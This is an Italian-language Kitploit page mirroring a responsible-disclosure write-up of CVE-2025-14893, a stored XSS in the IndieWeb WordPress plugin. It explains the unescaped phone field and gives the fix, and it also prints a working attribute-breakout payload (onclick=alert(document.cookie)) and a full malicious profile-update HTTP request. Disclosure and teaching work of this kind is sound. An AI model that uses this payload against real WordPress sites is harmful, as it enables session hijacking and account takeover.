Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-14893 — Cross-Site Scripting (XSS) Memorizzato Autenticato nel Plugin WordPress IndieWeb | Kitploit
Strumenti/GitHubGitHub/d3kc4rt1/cve-2025-14893
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

Cross-Site Scripting (XSS) Memorizzato Autenticato nel Plugin WordPress IndieWeb

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-14893: Cross-Site Scripting (XSS) Memorizzato Autenticato nel Plugin WordPress IndieWeb

Disclaimer: Questo repository è creato solo per scopi educativi e divulgazione etica. La vulnerabilità è stata segnalata responsabilmente al fornitore e corretta. Non utilizzare queste informazioni per sfruttare sistemi senza la dovuta autorizzazione.

Riepilogo Esecutivo

Una vulnerabilità di Cross-Site Scripting (XSS) Memorizzato è stata scoperta nel plugin IndieWeb per WordPress (versioni <= 4.0.5). Questa vulnerabilità consente a utenti autenticati con privilegi di Autore o superiori di iniettare JavaScript malevolo nel campo "Telefono" del proprio profilo utente.

Quando il "Widget H-Card del Profilo Autore" viene visualizzato nel frontend, lo script iniettato viene renderizzato senza una corretta sanitizzazione. Se un utente con privilegi elevati, come un Amministratore, fa clic sul collegamento manipolato, lo script viene eseguito nel contesto del suo browser. Ciò può portare a hijacking della sessione, azioni amministrative non autorizzate e completo Account Takeover (ATO).

Panoramica della Vulnerabilità

  • ID CVE: CVE-2025-14893
  • Prodotto: IndieWeb (Plugin WordPress)
  • Versioni Affette: <= 4.0.5
  • Tipo di Vulnerabilità: Cross-Site Scripting (XSS) Memorizzato (CWE-79)
  • Privilegi Richiesti: Autenticato (livello Autore e superiore)

Approfondimento Tecnico e Causa Principale

Il problema principale risiede nella gestione non sicura dei metadati utente all'interno del sistema di template del plugin, in particolare nella mancata utilizzazione delle funzioni di escaping integrate di WordPress.

File Vulnerabile: templates/h-card.php (Riga 27)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

Il Difetto: Il plugin visualizza direttamente i metadati tel dell'utente all'interno dell'attributo HTML href utilizzando echo senza avvolgerli in esc_attr(). Ciò consente a un attaccante di fornire una stringa appositamente costruita che include un doppio apice (") per chiudere prematuramente l'attributo href, seguito da attributi HTML arbitrari (come style o onclick).

Impatto sul Business

  • Account Takeover (ATO): Se un Amministratore interagisce con l'elemento manipolato, il JavaScript dell'attaccante può rubare i cookie di sessione o eseguire richieste AJAX amministrative, concedendo all'attaccante il controllo completo del sito WordPress.
  • Danno alla Reputazione: L'attaccante può modificare gli elementi visibili della pagina (defacement) o reindirizzare visitatori legittimi verso siti web terzi malevoli.

Proof of Concept (PoC)

Prerequisiti

  1. WordPress installato con IndieWeb <= 4.0.5 attivato.
  2. Un account attaccante con il ruolo di Autore.
  3. Il "Widget H-Card del Profilo Autore" aggiunto a un'area visibile del frontend (ad esempio, Sidebar).

Passaggi di Sfruttamento

  1. Accedi alla dashboard di WordPress come Autore.
  2. Vai su Profilo (/wp-admin/profile.php).
  3. Scorri verso il basso fino al campo Telefono.
  4. Inietta il seguente payload (che esce dall'attributo href):
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. Fai clic su Aggiorna Profilo.
  6. Passaggio Cruciale: Crea e pubblica un nuovo Articolo. Il widget vulnerabile viene visualizzato solo sulle pagine dei singoli articoli (is_single()) per mostrare le informazioni dell'autore.
  7. Attivazione: Quando un Amministratore visita l'articolo pubblicato nel frontend e fa clic sul pulsante "Click_Me" appena stilizzato, il payload XSS (che mostra i cookie di sessione) viene eseguito.

Esempio di Richiesta HTTP Malevola (Aggiornamento Profilo)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

Rimedio

Per correggere questa vulnerabilità, gli sviluppatori del plugin devono eseguire correttamente l'escape dell'output utilizzando le funzioni esc_attr() e esc_html() di WordPress.

Esempio di Codice Corretto:

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

Cronologia

  • Data (2026-03-03): Segnalato a Wordfence.
  • Data (2026-03-20): Vulnerabilità corretta / Divulgazione pubblica.

Riferimenti e Crediti

  • Database delle Vulnerabilità di Wordfence
  • CVE-2025-14893 su NVD
  • Plugin IndieWeb su WordPress.org
Scarica lo strumento